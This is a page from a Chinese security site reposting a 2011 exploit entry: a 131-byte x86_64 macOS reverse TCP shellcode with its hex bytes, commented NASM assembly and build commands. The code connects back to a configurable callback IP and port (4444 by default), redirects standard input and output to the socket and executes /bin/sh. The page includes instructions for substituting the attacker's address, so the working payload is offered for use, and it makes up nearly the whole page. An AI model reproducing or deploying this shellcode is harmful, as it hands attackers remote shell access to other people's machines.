首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OSX/Intel reverse_tcp shell x86_64 - 131 bytes
来源:http://www.hammackj.com 作者:hammackj 发布时间:2011-05-04  

;osx x64 reverse tcp shellcode (131 bytes)
;Jacob Hammack
;jacob.hammack@hammackj.com
;http://www.hammackj.com
;
;props to http://www.thexploit.com/ for the blog posts on x64 osx asm
;I borrowed some of his code
;

;#OSX reverse tcp shell (131 bytes)
;#replace FFFFFFFF around byte 43 with the call back ip in hex
;#replace 5C11 around byte 39 with a new port current is 4444
;shellcode =
;"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" +
;"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" +
;"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" +
;"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" +
;"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" +
;"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" +
;"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" +
;"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" +
;"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05"

;nasm -f macho reverse_tcp.s -o reverse_tcp.o
;ld -o reverse_tcp -e start reverse_tcp.o

BITS 64

section .text
global start

start:
  mov r8b, 0x02               ; unix class system calls = 2
  shl r8, 24                  ; shift left 24 to the upper order bits
  or r8, 0x61                 ; socket is 0x61
  mov rax, r8                 ; put socket syscall # into rax

;Socket
  xor rdx, rdx                ; zero out rdx
  mov rsi, rdx                ; AF_NET = 1
  inc rsi                     ; rsi = AF_NET
  mov rdi, rsi                ; SOCK_STREAM = 2
  inc rdi                     ; rdi = SOCK_STREAM
  syscall                     ; call socket(SOCK_STREAM, AF_NET, 0);

  mov r12, rax                ; Save the socket

;Sock_addr
  mov r13, 0xFFFFFFFF5C110101 ; IP = FFFFFFFF, Port = 5C11(4444)
  mov r9b, 0xFF               ; The sock_addr_in is + FF from where we need it
  sub r13, r9                 ; So we sub 0xFF from it to get the correct value and avoid a null
  push r13                    ; Push it on the stack
  mov r13, rsp                ; Save the sock_addr_in into r13


;Connect
  inc r8                      ; Connect = 0x62, so we inc by one from the previous syscall
  mov rax, r8                 ; move that into rax
  mov rdi, r12                ; move the saved socket fd into rdi
  mov rsi, r13                ; move the saved sock_addr_in into rsi
  add rdx, 0x10               ; add 0x10 to rdx
  syscall                     ; call connect(rdi, rsi, rdx)

  sub r8, 0x8                 ; subtract 8 from r8 for the next syscall dup2 0x90
  xor rsi, rsi                ; zero out rsi

dup:
  mov rax, r8                 ; move the syscall for dup2 into rax
  mov rdi, r12                ; move the FD for the socket into rdi
  syscall                     ; call dup2(rdi, rsi)

  cmp rsi, 0x2                ; check to see if we are still under 2
  inc rsi                     ; inc rsi
  jbe dup                     ; jmp if less than 2

  sub r8, 0x1F                ; setup the exec syscall at 0x3b
  mov rax, r8                 ; move the syscall into rax

;exec
  xor rdx, rdx                ; zero out rdx
  mov r13, 0x68732f6e69622fFF ; '/bin/sh' in hex
  shr r13, 8                  ; shift right to create the null terminator
  push r13                    ; push to the stack
  mov rdi, rsp                ; move the command from the stack to rdi
  xor rsi, rsi                ; zero out rsi
  syscall                     ; call exec(rdi, 0, 0)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetOp Remote Control 8.0, 9.1,
·Subtitle Processor 7.7.1 .M3U
·libmodplug <= 0.8.8.2 .abc Sta
·Microsoft Office Excel Axis Pr
·EMC HomeBase Server Directory
·MJM Core Player 2011 .s3m Stac
·MJM QuickPlayer 1.00 beta 60a
·Subtitle Processor 7.7.1 SEH U
·OpenMyZip V0.1 .ZIP File Buffe
·ICONICS WebHMI ActiveX Stack O
·Exponent CMS 2.0 Beta 1.1 CSRF
·Multiple Vendors libc/glob(3)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved